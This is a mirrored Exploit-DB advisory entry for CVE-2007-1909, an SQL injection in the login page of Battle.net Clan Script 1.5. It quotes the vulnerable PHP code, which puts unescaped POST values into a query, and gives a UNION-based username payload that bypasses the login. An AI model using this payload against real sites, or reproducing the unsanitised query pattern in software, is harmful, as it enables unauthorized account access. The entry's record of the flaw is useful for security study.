- 34,599
- 0
- 18 Дек 2022
- EDB-ID
- 3691
- Проверка EDB
-
- Пройдено
- Автор
- H A C K E R _ X
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2007-1909
- Дата публикации
- 2007-04-09
Код:
****************************************
script : Battle.net Clan Script 1.5
file : login.php
attack : injection sql
auteur : h a c k e r _ X
***************************************
code :
------------------------------------------------------------------------------------------
line 9 --> $user = $_POST['user'];
line 10--> $pass = $_POST['pass'];
.....
.....
.....
line 21--> mysql_query("SELECT * FROM bcs_members WHERE name='$user' AND password='$pass'", $link);
*******
-------------------------------------------------------------------------------------------------
exploit :
*******
Username : ' union select 0,0,0,0,0,0,0,0,0,0,0 from bcs_members/*
password : enything
************************************************** *
thinks to : max007,simo64,brutalism and all marocains hackers
special thinks for "P Y N S S O"
************************************************** *
# milw0rm.com [2007-04-09]- Источник
- www.exploit-db.com
